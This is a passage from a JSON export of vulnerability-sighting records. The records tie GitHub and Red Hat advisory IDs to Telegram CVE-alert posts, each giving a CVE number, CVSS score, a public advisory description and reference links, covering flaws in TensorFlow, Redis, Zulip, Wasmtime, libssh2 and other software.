https://access.redhat.com/errata/RHSA-2024:4469\n5. https://access.redhat.com/errata/RHSA-2024:4474\n6. https://access.redhat.com/errata/RHSA-2024:4479\n7. https://access.redhat.com/errata/RHSA-2024:4484\n8. https://access.redhat.com/security/cve/CVE-2024-6387\n9. https://bugzilla.redhat.com/show_bug.cgi?id=2294604\n10. https://santandersecurityresearch.github.io/blog/sshing_the_masses.html\n11. https://www.openssh.com/txt/release-9.8\n12. https://www.qualys.com/2024/07/01/cve-2024-6387/regresshion.txt", "creation_timestamp": "2025-04-24T19:06:47.000000Z"}, {"uuid": "de6ff444-bdf3-4787-8dd8-2312fc6935c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XV8M-365J-X6H2", "type": "published-proof-of-concept", "source": "Telegram/mK8o9C1rhrHkVcM37GZHvLPW6XA5mG-AmvsJea-RQorcPsU", "content": "", "creation_timestamp": "2026-01-02T21:52:17.000000Z"}, {"uuid": "757007dd-342a-41ed-bf62-c7b53fe0c6c7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G468-QJ8G-VCJC", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13080", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-36016\n\ud83d\udd25 CVSS Score: 5.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: TensorFlow is an open source platform for machine learning. When `tensorflow::full_type::SubstituteFromAttrs` receives a `FullTypeDef&amp; t` that is not exactly three args, it triggers a `CHECK`-fail instead of returning a status. We have patched the issue in GitHub commit 6104f0d4091c260ce9352f9155f7e9b725eab012. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known workarounds for this issue.\n\ud83d\udccf Published: 2022-09-16T22:10:36.000Z\n\ud83d\udccf Modified: 2025-04-23T17:00:33.911Z\n\ud83d\udd17 References:\n1. https://github.com/tensorflow/tensorflow/security/advisories/GHSA-g468-qj8g-vcjc\n2. https://github.com/tensorflow/tensorflow/commit/6104f0d4091c260ce9352f9155f7e9b725eab012\n3. https://github.com/tensorflow/tensorflow/blob/master/tensorflow/core/ops/math_ops.cc", "creation_timestamp": "2025-04-23T17:04:51.000000Z"}, {"uuid": "a2efaf96-5d21-4f92-ad36-d2f4b4779d07", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-VM7X-4QHJ-RRCQ", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13085", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-35991\n\ud83d\udd25 CVSS Score: 5.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: TensorFlow is an open source platform for machine learning. When `TensorListScatter` and `TensorListScatterV2` receive an `element_shape` of a rank greater than one, they give a `CHECK` fail that can trigger a denial of service attack. We have patched the issue in GitHub commit bb03fdf4aae944ab2e4b35c7daa051068a8b7f61. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known workarounds for this issue.\n\ud83d\udccf Published: 2022-09-16T22:20:16.000Z\n\ud83d\udccf Modified: 2025-04-23T16:59:59.552Z\n\ud83d\udd17 References:\n1. https://github.com/tensorflow/tensorflow/security/advisories/GHSA-vm7x-4qhj-rrcq\n2. https://github.com/tensorflow/tensorflow/commit/bb03fdf4aae944ab2e4b35c7daa051068a8b7f61", "creation_timestamp": "2025-04-23T17:04:59.000000Z"}, {"uuid": "301d65fa-3b50-44a5-b1fd-e7d47b615968", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V98V-FF95-F3CP", "type": "published-proof-of-concept", "source": "Telegram/mK8o9C1rhrHkVcM37GZHvLPW6XA5mG-AmvsJea-RQorcPsU", "content": "", "creation_timestamp": "2026-01-02T21:52:17.000000Z"}, {"uuid": "e0cf27a3-fd6e-4c7e-aa55-709b4455da04", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F43R-CC68-GPX4", "type": "published-proof-of-concept", "source": "Telegram/mK8o9C1rhrHkVcM37GZHvLPW6XA5mG-AmvsJea-RQorcPsU", "content": "", "creation_timestamp": "2026-01-02T21:52:17.000000Z"}, {"uuid": "09cbf00c-de58-4ae4-854f-62705671ed2d", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F7PH-RC3W-QP28", "type": "published-proof-of-concept", "source": "Telegram/79M2PUWRnDZFfaBX3deh-SQz72WULa4jlHjBh-ox2wjl5as", "content": "", "creation_timestamp": "2026-01-02T21:53:02.000000Z"}, {"uuid": "355f6ed5-771b-4e68-a3e5-5fb72283a8c4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MV8M-8X97-937Q", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13078", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-36004\n\ud83d\udd25 CVSS Score: 5.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: TensorFlow is an open source platform for machine learning. When `tf.random.gamma` receives large input shape and rates, it gives a `CHECK` fail that can trigger a denial of service attack. We have patched the issue in GitHub commit 552bfced6ce4809db5f3ca305f60ff80dd40c5a3. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known workarounds for this issue.\n\ud83d\udccf Published: 2022-09-16T22:10:26.000Z\n\ud83d\udccf Modified: 2025-04-23T17:00:45.804Z\n\ud83d\udd17 References:\n1. https://github.com/tensorflow/tensorflow/commit/552bfced6ce4809db5f3ca305f60ff80dd40c5a3\n2. https://github.com/tensorflow/tensorflow/security/advisories/GHSA-mv8m-8x97-937q", "creation_timestamp": "2025-04-23T17:04:50.000000Z"}, {"uuid": "9b39b204-9552-4cce-b87c-3109cab09df2", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-P7HR-F446-X6QF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13082", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-35997\n\ud83d\udd25 CVSS Score: 5.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: TensorFlow is an open source platform for machine learning. If `tf.sparse.cross` receives an input `separator` that is not a scalar, it gives a `CHECK` fail that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit 83dcb4dbfa094e33db084e97c4d0531a559e0ebf. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known workarounds for this issue.\n\ud83d\udccf Published: 2022-09-16T22:15:18.000Z\n\ud83d\udccf Modified: 2025-04-23T17:00:21.604Z\n\ud83d\udd17 References:\n1. https://github.com/tensorflow/tensorflow/security/advisories/GHSA-p7hr-f446-x6qf\n2. https://github.com/tensorflow/tensorflow/commit/83dcb4dbfa094e33db084e97c4d0531a559e0ebf", "creation_timestamp": "2025-04-23T17:04:56.000000Z"}, {"uuid": "a9821a25-7326-4554-afe1-32e1bcbe3f39", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5JGQ-X857-P8XW", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13122", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-24738\n\ud83d\udd25 CVSS Score: 8.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N)\n\ud83d\udd39 Description: Evmos is the Ethereum Virtual Machine (EVM) Hub on the Cosmos Network. In versions of evmos prior to 2.0.1 attackers are able to drain unclaimed funds from user addresses. To do this an attacker must create a new chain which does not enforce signature verification and connects it to the target evmos instance. The attacker can use this joined chain to transfer unclaimed funds. Users are advised to upgrade. There are no known workarounds for this issue.\n\ud83d\udccf Published: 2022-03-07T21:30:13.000Z\n\ud83d\udccf Modified: 2025-04-23T18:58:57.669Z\n\ud83d\udd17 References:\n1. https://github.com/tharsis/evmos/security/advisories/GHSA-5jgq-x857-p8xw\n2. https://github.com/tharsis/evmos/commit/28870258d4ee9f1b8aeef5eba891681f89348f71\n3. https://github.com/tharsis/evmos/releases/tag/v2.0.1", "creation_timestamp": "2025-04-23T19:05:20.000000Z"}, {"uuid": "cb6af3e5-319e-4d03-90bc-6797e8ec11ec", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-PQGX-6WG3-GMVR", "type": "published-proof-of-concept", "source": "Telegram/qOZ2r4xRzPVMqHinUj39Gu9PbW29JKKteUw1FN_MXLxRZs4", "content": "", "creation_timestamp": "2026-01-02T21:54:03.000000Z"}, {"uuid": "ebd7ac61-eeb0-436c-a03c-4b8df9dccd58", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-WQ6Q-6M32-9RV9", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13087", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-35993\n\ud83d\udd25 CVSS Score: 5.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: TensorFlow is an open source platform for machine learning. When `SetSize` receives an input `set_shape` that is not a 1D tensor, it gives a `CHECK` fails that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit cf70b79d2662c0d3c6af74583641e345fc939467. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known workarounds for this issue.\n\ud83d\udccf Published: 2022-09-16T22:20:25.000Z\n\ud83d\udccf Modified: 2025-04-23T16:59:47.807Z\n\ud83d\udd17 References:\n1. https://github.com/tensorflow/tensorflow/security/advisories/GHSA-wq6q-6m32-9rv9\n2. https://github.com/tensorflow/tensorflow/commit/cf70b79d2662c0d3c6af74583641e345fc939467", "creation_timestamp": "2025-04-23T17:05:04.000000Z"}, {"uuid": "ff170659-c85f-43b6-b735-de452e3e0732", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9V8W-XMR4-WGXP", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13086", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-35992\n\ud83d\udd25 CVSS Score: 5.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: TensorFlow is an open source platform for machine learning. When `TensorListFromTensor` receives an `element_shape` of a rank greater than one, it gives a `CHECK` fail that can trigger a denial of service attack. We have patched the issue in GitHub commit 3db59a042a38f4338aa207922fa2f476e000a6ee. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known workarounds for this issue.\n\ud83d\udccf Published: 2022-09-16T22:20:21.000Z\n\ud83d\udccf Modified: 2025-04-23T16:59:53.884Z\n\ud83d\udd17 References:\n1. https://github.com/tensorflow/tensorflow/security/advisories/GHSA-9v8w-xmr4-wgxp\n2. https://github.com/tensorflow/tensorflow/commit/3db59a042a38f4338aa207922fa2f476e000a6ee", "creation_timestamp": "2025-04-23T17:05:03.000000Z"}, {"uuid": "56712300-3180-4c9c-9180-e64c75e33fc1", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-C3CP-GGG5-9XW5", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13100", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-31168\n\ud83d\udd25 CVSS Score: 5.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N)\n\ud83d\udd39 Description: Zulip is an open source team chat tool. Due to an incorrect authorization check in Zulip Server 5.4 and earlier, a member of an organization could craft an API call that grants organization administrator privileges to one of their bots. The vulnerability is fixed in Zulip Server 5.5. Members who don\u2019t own any bots, and lack permission to create them, can\u2019t exploit the vulnerability. As a workaround for the vulnerability, an organization administrator can restrict the `Who can create bots` permission to administrators only, and change the ownership of existing bots.\n\ud83d\udccf Published: 2022-07-22T13:05:12.000Z\n\ud83d\udccf Modified: 2025-04-23T17:57:19.812Z\n\ud83d\udd17 References:\n1. https://github.com/zulip/zulip/security/advisories/GHSA-c3cp-ggg5-9xw5\n2. https://github.com/zulip/zulip/commit/751b2a03e565e9eb02ffe923b7c24ac73d604034\n3. https://github.com/zulip/zulip/releases/tag/5.5", "creation_timestamp": "2025-04-23T18:05:39.000000Z"}, {"uuid": "a42e9abe-6ed1-41d2-9bab-dd10765ce37f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QHW4-WWR7-GJC5", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/13083", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-35998\n\ud83d\udd25 CVSS Score: 5.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: TensorFlow is an open source platform for machine learning. If `EmptyTensorList` receives an input `element_shape` with more than one dimension, it gives a `CHECK` fail that can be used to trigger a denial of service attack. We have patched the issue in GitHub commit c8ba76d48567aed347508e0552a257641931024d. The fix will be included in TensorFlow 2.10.0. We will also cherrypick this commit on TensorFlow 2.9.1, TensorFlow 2.8.1, and TensorFlow 2.7.2, as these are also affected and still in supported range. There are no known workarounds for this issue.\n\ud83d\udccf Published: 2022-09-16T22:15:23.000Z\n\ud83d\udccf Modified: 2025-04-23T17:00:15.815Z\n\ud83d\udd17 References:\n1. https://github.com/tensorflow/tensorflow/security/advisories/GHSA-qhw4-wwr7-gjc5\n2. https://github.com/tensorflow/tensorflow/commit/c8ba76d48567aed347508e0552a257641931024d", "creation_timestamp": "2025-04-23T17:04:57.000000Z"}, {"uuid": "d104564a-5ddd-49be-a589-7e650d11caf4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-W6CX-QG2Q-RVQ8", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13116", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-24718\n\ud83d\udd25 CVSS Score: 7.6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:L)\n\ud83d\udd39 Description: ssr-pages is an HTML page builder for the purpose of server-side rendering (SSR). In versions prior to 0.1.4, a path traversal issue can occur when providing untrusted input to the `svg` property as an argument to the `build(MessagePageOptions)` function. While there is no known workaround at this time, there is a patch in version 0.1.4.\n\ud83d\udccf Published: 2022-03-01T18:45:13.000Z\n\ud83d\udccf Modified: 2025-04-23T18:59:37.239Z\n\ud83d\udd17 References:\n1. https://github.com/Finastra/ssr-pages/security/advisories/GHSA-w6cx-qg2q-rvq8\n2. https://github.com/Finastra/ssr-pages/pull/1\n3. https://github.com/Finastra/ssr-pages/pull/1/commits/c3e4c563384ae3ba3892f37dd190218577620780", "creation_timestamp": "2025-04-23T19:05:11.000000Z"}, {"uuid": "f602a314-a238-4f3c-8e0d-1b1cc8678ce8", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CM9W-C4RJ-R2CF", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13120", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-24722\n\ud83d\udd25 CVSS Score: 8.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N)\n\ud83d\udd39 Description: VIewComponent is a framework for building view components in Ruby on Rails. Versions prior to 2.31.2 and 2.49.1 contain a cross-site scripting vulnerability that has the potential to impact anyone using translations with the view_component gem. Data received via user input and passed as an interpolation argument to the `translate` method is not properly sanitized before display. Versions 2.31.2 and 2.49.1 have been released and fully mitigate the vulnerability. As a workaround, avoid passing user input to the `translate` function, or sanitize the inputs before passing them.\n\ud83d\udccf Published: 2022-03-02T22:40:11.000Z\n\ud83d\udccf Modified: 2025-04-23T18:59:13.837Z\n\ud83d\udd17 References:\n1. https://github.com/github/view_component/security/advisories/GHSA-cm9w-c4rj-r2cf\n2. https://github.com/github/view_component/commit/3f82a6e62578ff6f361aba24a1feb2caccf83ff9\n3. https://github.com/github/view_component/releases/tag/v2.31.2\n4. https://github.com/github/view_component/releases/tag/v2.49.1", "creation_timestamp": "2025-04-23T19:05:15.000000Z"}, {"uuid": "46e22515-73ae-4973-beec-001c52fab0d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-2J6V-XPF3-XVRV", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13114", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2021-41193\n\ud83d\udd25 CVSS Score: 9.8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: wire-avs is the audio visual signaling (AVS) component of Wire, an open-source messenger. A remote format string vulnerability in versions prior to 7.1.12 allows an attacker to cause a denial of service or possibly execute arbitrary code. The issue has been fixed in wire-avs 7.1.12. There are currently no known workarounds.\n\ud83d\udccf Published: 2022-03-01T18:25:22.000Z\n\ud83d\udccf Modified: 2025-04-23T18:59:49.177Z\n\ud83d\udd17 References:\n1. https://github.com/wireapp/wire-avs/security/advisories/GHSA-2j6v-xpf3-xvrv\n2. https://github.com/wireapp/wire-avs/commit/40d373ede795443ae6f2f756e9fb1f4f4ae90bbe", "creation_timestamp": "2025-04-23T19:05:06.000000Z"}, {"uuid": "a74eeb27-1375-44b4-a8df-4d6b5ae40b71", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XVM2-9XVC-HX7F", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13118", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-23640\n\ud83d\udd25 CVSS Score: 9.8 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: Excel-Streaming-Reader is an easy-to-use implementation of a streaming Excel reader using Apache POI. Prior to xlsx-streamer 2.1.0, the XML parser that was used did apply all the necessary settings to prevent XML Entity Expansion issues. Upgrade to version 2.1.0 to receive a patch. There is no known workaround.\n\ud83d\udccf Published: 2022-03-02T19:50:10.000Z\n\ud83d\udccf Modified: 2025-04-23T18:59:25.932Z\n\ud83d\udd17 References:\n1. https://github.com/monitorjbl/excel-streaming-reader/security/advisories/GHSA-xvm2-9xvc-hx7f\n2. https://github.com/monitorjbl/excel-streaming-reader/commit/0749c7b9709db078ccdeada16d46a34bc2910c73", "creation_timestamp": "2025-04-23T19:05:13.000000Z"}, {"uuid": "44d459ef-08b8-496e-a8a3-29562025b76b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-5FHJ-G3P3-PQ9G", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13094", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-31146\n\ud83d\udd25 CVSS Score: 6.4 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:L/A:L)\n\ud83d\udd39 Description: Wasmtime is a standalone runtime for WebAssembly. There is a bug in the Wasmtime's code generator, Cranelift, where functions using reference types may be incorrectly missing metadata required for runtime garbage collection. This means that if a GC happens at runtime then the GC pass will mistakenly think these functions do not have live references to GC'd values, reclaiming them and deallocating them. The function will then subsequently continue to use the values assuming they had not been GC'd, leading later to a use-after-free. This bug was introduced in the migration to the `regalloc2` register allocator that occurred in the Wasmtime 0.37.0 release on 2022-05-20. This bug has been patched and users should upgrade to Wasmtime version 0.38.2. Mitigations for this issue can be achieved by disabling the reference types proposal by passing `false` to `wasmtime::Config::wasm_reference_types` or downgrading to Wasmtime 0.36.0 or prior.\n\ud83d\udccf Published: 2022-07-20T22:30:16.000Z\n\ud83d\udccf Modified: 2025-04-23T17:57:59.088Z\n\ud83d\udd17 References:\n1. https://github.com/bytecodealliance/wasmtime/security/advisories/GHSA-5fhj-g3p3-pq9g\n2. https://github.com/WebAssembly/reference-types\n3. https://github.com/bytecodealliance/wasmtime/", "creation_timestamp": "2025-04-23T18:05:29.000000Z"}, {"uuid": "a8e9c37d-4eb0-40a4-9e76-5488e0267ae7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-96F7-42FG-2JRH", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/13093", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-31144\n\ud83d\udd25 CVSS Score: 7 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: Redis is an in-memory database that persists on disk. A specially crafted `XAUTOCLAIM` command on a stream key in a specific state may result with heap overflow, and potentially remote code execution. This problem affects versions on the 7.x branch prior to 7.0.4. The patch is released in version 7.0.4.\n\ud83d\udccf Published: 2022-07-19T20:15:13.000Z\n\ud83d\udccf Modified: 2025-04-23T17:58:05.076Z\n\ud83d\udd17 References:\n1. https://github.com/redis/redis/security/advisories/GHSA-96f7-42fg-2jrh\n2. https://github.com/redis/redis/releases/tag/7.0.4\n3. https://security.netapp.com/advisory/ntap-20220909-0002/\n4. https://security.gentoo.org/glsa/202209-17", "creation_timestamp": "2025-04-23T18:05:28.000000Z"}, {"uuid": "3d2956cb-5aee-4669-b0d8-4f58676a4f9e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7F6X-JWH5-M9R4", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/13097", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2022-31169\n\ud83d\udd25 CVSS Score: 5.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N)\n\ud83d\udd39 Description: Wasmtime is a standalone runtime for WebAssembly. There is a bug in Wasmtime's code generator, Cranelift, for AArch64 targets where constant divisors can result in incorrect division results at runtime. This affects Wasmtime prior to version 0.38.2 and Cranelift prior to 0.85.2. This issue only affects the AArch64 platform. Other platforms are not affected. The translation rules for constants did not take into account whether sign or zero-extension should happen which resulted in an incorrect value being placed into a register when a division was encountered. The impact of this bug is that programs executing within the WebAssembly sandbox would not behave according to the WebAssembly specification. This means that it is hypothetically possible for execution within the sandbox to go awry and WebAssembly programs could produce unexpected results. This should not impact hosts executing WebAssembly but does affect the correctness of guest programs. This bug has been patched in Wasmtime version 0.38.2 and cranelift-codegen 0.85.2. There are no known workarounds.\n\ud83d\udccf Published: 2022-07-21T13:50:11.000Z\n\ud83d\udccf Modified: 2025-04-23T17:57:39.563Z\n\ud83d\udd17 References:\n1. https://github.com/bytecodealliance/wasmtime/security/advisories/GHSA-7f6x-jwh5-m9r4\n2. https://github.com/bytecodealliance/wasmtime/commit/2ba4bce5cc719e5a74e571a534424614e62ecc41", "creation_timestamp": "2025-04-23T18:05:37.000000Z"}, {"uuid": "aee56a1b-317a-4547-8053-4a9b169a4143", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:1175", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/13137", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2019-3856\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_0, Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: An integer overflow flaw, which could lead to an out of bounds write, was discovered in libssh2 before 1.8.1 in the way keyboard prompt requests are parsed. A remote attacker who compromises a SSH server may be able to execute code on the client system when a user connects to the server.\n\ud83d\udccf Published: 2019-03-25T18:31:03.000Z\n\ud83d\udccf Modified: 2025-04-23T19:48:00.365Z\n\ud83d\udd17 References:\n1. https://www.libssh2.org/CVE-2019-3856.html\n2. https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2019-3856\n3. https://lists.debian.org/debian-lts-announce/2019/03/msg00032.html\n4. https://security.netapp.com/advisory/ntap-20190327-0005/\n5. https://access.redhat.com/errata/RHSA-2019:0679\n6. http://lists.opensuse.org/opensuse-security-announce/2019-03/msg00040.html\n7. http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00003.html\n8. https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/5DK6VO2CEUTAJFYIKWNZKEKYMYR3NO2O/\n9. https://www.debian.org/security/2019/dsa-4431\n10. https://seclists.org/bugtraq/2019/Apr/25\n11. https://access.redhat.com/errata/RHSA-2019:1175\n12. https://access.redhat.com/errata/RHSA-2019:1652\n13. https://access.redhat.com/errata/RHSA-2019:1791\n14. https://access.redhat.com/errata/RHSA-2019:1943\n15. https://access.redhat.com/errata/RHSA-2019:2399\n16. https://www.oracle.com/technetwork/security-advisory/cpuoct2019-5072832.html", "creation_timestamp": "2025-04-23T20:04:49.000000Z"}, {"uuid": "c7dc06dc-49c4-45d1-ac3d-6c22e7b1fede", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2019:1943", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/13137", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2019-3856\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_0, Vector: CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H)\n\ud83d\udd39 Description: An integer overflow flaw, which could lead to an out of bounds write, was discovered in libssh2 before 1.8.1 in the way keyboard prompt requests are parsed. A remote attacker who compromises a SSH server may be able to execute code on the client system when a user connects to the server.\n\ud83d\udccf Published: 2019-03-25T18:31:03.000Z\n\ud83d\udccf Modified: 2025-04-23T19:48:00.365Z\n\ud83d\udd17 